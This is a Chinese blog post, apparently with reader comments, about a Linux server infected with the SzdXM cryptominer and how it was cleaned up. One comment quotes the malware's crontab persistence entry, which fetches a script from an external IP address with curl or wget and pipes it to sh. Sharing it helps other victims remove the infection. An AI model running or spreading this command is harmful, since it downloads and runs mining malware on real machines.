SzdXM进程是什么东西,占用cpu资源近100%?

SzdXM进程杀不掉,自动出现在不同的目录,自动运行占用CPU资源。

SzdXM进程是什么东西,占用cpu资源96%?

Linux top command.JPG

宝塔面板CPU占用百分百,悲剧了,就说网站打开怎么如此缓慢。
bt.JPG

阿里后端工程师回复,果然中毒了
Ali work order.JPG

/tmp/SzdXM是什么东西?
tmp-SzdXm.JPG

等待了一晚,回复是挖矿程序,他们需要高昂的费用,才帮我弄!!!
final.png

重装,删除不用的端口,加SSL,过了一周多了,问题解决。
SzdXM-kill-9.JPG

《SzdXM进程是什么东西,占用cpu资源近100%?》有3个想法

  1. 一样,我的也中了这个毒,不过可以kill和删除文件。它会重复复制自身到/tmp/目录下然后再启动。
    删除后在同一位置创建同名文件夹之后,目前暂时没有看到它自我复制和进程开启。
    再观察几天。

    1. 有个相关帖子。
      https://blog.csdn.net/jonesAriven/article/details/100775302#commentsedit

      只是在我这里是叫SzdXM和ujmofa4。kill掉相关进程并删除文件后,务必要在对应目录原地创建个同名目录,这样可以有效干扰它的运行。然后删除crontab中的定时任务,重启crontab服务。 目前正在观察。

      crontab中的定时任务:
      */15 * * * * (/usr/bin/ujmofa4||/usr/libexec/ujmofa4||/usr/local/bin/ujmofa4||/tmp/ujmofa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注